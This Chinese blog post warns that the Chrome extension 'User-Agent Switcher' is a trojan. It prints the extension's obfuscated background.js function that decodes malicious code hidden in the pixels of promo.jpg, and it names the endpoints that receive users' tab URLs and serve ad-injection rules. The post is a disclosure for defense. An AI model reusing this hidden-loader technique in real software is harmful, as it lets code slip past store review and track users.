当前位置:首页 > 短网址资讯 > 正文内容

大家一定注意了 Chrome 的插件 User-Agent Switcher 是个木马!

www.ft12.com6年前 (2017-09-10)短网址资讯2227
hrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {            if ("" === '../promo.jpg') return "";            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];            if (c.data.every(function(t) {                    return 0 === t
                })) return "";
            var m, s;            if (1 === o)                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 


扫描二维码推送至手机访问。

版权声明:本文由短链接发布,如需转载请注明出处。

本文链接:https://www.ft12.com/article_469.html

分享给朋友:

相关文章

腾讯短网址在线生成哪家好?

 众所周知,腾讯短网址就是腾讯微博的url.cn。这个短网址的优点是:访问速度快、可以在腾讯QQ以及腾讯微信等腾讯系的社交软件上传播。缺点:由于接入了腾讯的恶意网址检测api,所以如果你的网址被多人举报,很容易被拦截。所以,很难从...

现实版“樊胜美”被逼出10万给弟弟买婚房,已成普遍现象

现实版“樊胜美”被逼出10万给弟弟买婚房,已成普遍现象

女权主义已经如此“嚣张”,女性数量也这么稀缺,女性的地位难道还依旧低下吗?关于“女子被逼出10万给弟弟买婚房”这则新闻,虽然不少网友纠结于,近20年前该女子父母每月给她300元生活费算不算亏待,但绝大多数网友都仍是认定,这个女子32岁了父母...

马云终于食言了,菜鸟网络宣布入股速递易,智能快件箱企业迎来洗牌期

2017年6月8日傍晚,FT12短网址的小编获知,智能快件箱代表公司速递易的母公司成都三泰控股集团股份有限公司(简称:*ST三泰)发布布告称,继中国邮政和复星之后,新增与菜鸟签订开端协作意向书。*ST三泰同时表明,此本买卖触及全资子公司成都...

电子支付与现金支付的区别---FT12短网址

前不久附近那家移动营业厅取消了现金充值业务,这让我这个倾向于现金(人民币)消费的人冲话费更加麻烦了。每次跑到便利店找店老板用微信给我手机冲话费(我给他现金),老板有时不在碰到老板娘都不会冲,手机停机属正常现象。借FT12短网址发个牢骚:名人...

短网址公司反腐的力度正在逐渐加强

过去短网址行业的糜烂,是大公司的专利,阿里巴巴出个阎利珉,更早之前,百度反掉了好几个副总裁,视频网站收购是重灾区,腾讯的刘春宁,优酷的卢梵溪……反倒是近来两年疯狂购剧的爱奇艺没出来啥丑闻,不知道是时分未到仍是真的内控做得好。2012年后被职...

都有哪些地方需要用到短网址?

为什么有那么多互联网企业推出短网址业务?包括google、百度、新浪、腾讯......首先网址缩短这种服务是在微博出现之后才流行开来的,原因很简单,微博140字限制,能表达的内容本来就两三句,如果再出现一个网址,就会占用非常大的篇幅,比如本...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。